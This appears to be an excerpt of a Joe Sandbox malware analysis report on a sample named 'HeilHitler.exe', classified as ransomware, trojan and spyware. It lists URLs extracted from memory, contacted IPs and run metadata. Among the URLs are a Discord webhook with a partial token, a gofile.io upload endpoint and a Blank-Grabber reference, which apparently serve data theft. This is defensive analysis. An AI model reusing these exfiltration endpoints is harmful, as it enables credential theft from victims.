https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename | Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy | Source: HeilHitler.exe, 00000001.00000002.2031557342.000001BD43A30000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688 | Source: HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://pesterbdd.com/images/Pester.png | Source: powershell.exe, 00000026.00000002.1830812751.000002871D000000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://schemas.xmlsoap.org/soap/encoding/ | Source: powershell.exe, 00000007.00000002.1766127413.0000026DB0E39000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://www.apache.org/licenses/LICENSE-2.0.html | Source: powershell.exe, 00000026.00000002.1830812751.000002871D000000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code | Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://go.micro | Source: powershell.exe, 00000026.00000002.1830812751.000002871C5C7000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader | Source: HeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://www.amazon.com/ | Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://contoso.com/Icon | Source: powershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://httpbin.org/ | Source: HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | Source: HeilHitler.exe, 00000000.00000003.1680320755.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.dr | Malicious: false | Reputation: high
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module | Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | Source: HeilHitler.exe, 00000001.00000003.1907543224.000001BD434D3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434A1000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches | Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://www.ecosia.org/newtab/ | Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | Source: HeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1730926379.000001BD4367B000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718513847.000001BD436DA000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1724146953.000001BD436E7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://github.com/Pester/Pester | Source: powershell.exe, 00000026.00000002.1830812751.000002871D000000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535 | Source: HeilHitler.exe, 00000001.00000002.2028781492.000001BD43623000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy | Source: HeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://MD8.mozilla.org/1/m | Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://ocsp.sectigo.com0$ | Source: HeilHitler.exe | Malicious: false | Reputation: high
https://bugzilla.mo | Source: HeilHitler.exe, 00000001.00000002.2032762896.000001BD43DE7000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://tools.ietf.org/html/rfc6125#section-6.4.3 | Source: HeilHitler.exe, 00000001.00000002.2031557342.000001BD43A30000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://schemas.xmlsoap.org/wsdl/ | Source: powershell.exe, 00000007.00000002.1766127413.0000026DB0E39000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://google.com/mail | Source: HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1752805888.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717535771.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1732575141.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1748948213.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | Source: HeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907174052.000001BD43738000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py | Source: HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://www.google.com/ | Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://foss.heptapod.net/pypy/pypy/-/issues/3539 | Source: HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900. | Source: HeilHitler.exe, 00000001.00000003.1907543224.000001BD434A1000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434A6000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1753590052.000001BD434A4000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2027310965.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434A4000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2026948270.000001BD43330000.00000004.00000020.00020000.00000000.sdmp | Malicious: false
                                                                                                                              high
                                                                                                                              http://google.com/HeilHitler.exe, 00000001.00000002.2028781492.000001BD43623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFHeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://ocsp.sectigo.com0HeilHitler.exe, rar.exe.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.python.org/download/releases/2.3/mro/.HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://contoso.com/Licensepowershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://discordapp.com/api/v9/users/HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourceHeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://discord.com/api/webhooks/1302413781162266715/WJ0cdpWb68IO94MZWMtc7o2HkgZFWYLoExtrMC3fyimxUgRHeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specHeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#HeilHitler.exefalse
                                                                                                                                                    high
                                                                                                                                                    https://github.com/urllib3/urllib3/issues/2920HeilHitler.exe, 00000001.00000002.2031557342.000001BD43A30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17HeilHitler.exe, 00000001.00000003.1907543224.000001BD434D3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434A1000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#HeilHitler.exe, 00000000.00000003.1680320755.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsCHeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataHeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://yahoo.com/HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1752805888.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717535771.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1732575141.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1748948213.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.microsoftOWNLO~1.TXTy.HeilHitler.exe, 00000001.00000003.2021328315.000001BD43658000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2030548396.000001BD4365F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2021194278.000001BD43652000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2021471863.000001BD4365E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://account.bellmedia.cHeilHitler.exe, 00000001.00000002.2032925274.000001BD44538000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1761523281.000001BD4377A000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763010385.000001BD4377B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6HeilHitler.exe, 00000001.00000002.2026948270.000001BD43481000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://login.microsoftonline.comHeilHitler.exe, 00000001.00000002.2032925274.000001BD44544000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1761523281.000001BD4377A000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763010385.000001BD4377B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0HeilHitler.exe, 00000000.00000003.1680320755.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679598819.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://html.spec.whatwg.org/multipage/HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1752805888.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717535771.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1732575141.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1748948213.000001BD43091000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsHeilHitler.exe, 00000001.00000002.2031684377.000001BD43B30000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.zhihu.com/HeilHitler.exe, 00000001.00000003.1907250502.000001BD43701000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2019563496.000001BD43701000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallHeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907174052.000001BD43738000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchHeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.rfc-editor.org/rfc/rfc8259#section-8.1HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD4348C000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD43498000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://contoso.com/powershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://oneget.orgXpowershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://api.gofile.io/getServerHeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0HeilHitler.exefalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0powershell.exe, 00000007.00000002.1838904578.0000026DC92AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngHeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1824453418.0000026DC0C84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1887725142.000002872B8AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871D05B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://sectigo.com/CPS0HeilHitler.exe, rar.exe.0.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoHeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://www.amazon.co.uk/HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://ocsp.thawte.com0HeilHitler.exe, 00000000.00000003.1680320755.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679598819.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://json.orgHeilHitler.exe, 00000001.00000003.2021033088.000001BD43107000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2026948270.000001BD43330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://www.python.org/dev/peps/pep-0205/HeilHitler.exe, 00000000.00000003.1678922666.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://www.wykop.pl/HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C7C000.00000004.00001000.00020000.00000000.sdmpfalse
Reputation: high

Name: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://twitter.com/
Source: HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://www.olx.pl/
Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://support.mozilla.org/products/firefox
Source: HeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718513847.000001BD436DA000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2026948270.000001BD43330000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
162.159.128.233 | discord.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1556385
Start date and time:2024-11-15 10:43:10 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 11m 50s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:88
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:HeilHitler.exe
Detection:MAL
Classification:mal100.rans.troj.spyw.expl.evad.winEXE@139/52@2/2
EGA Information:
• Successful, ratio: 60%
HCA Information:
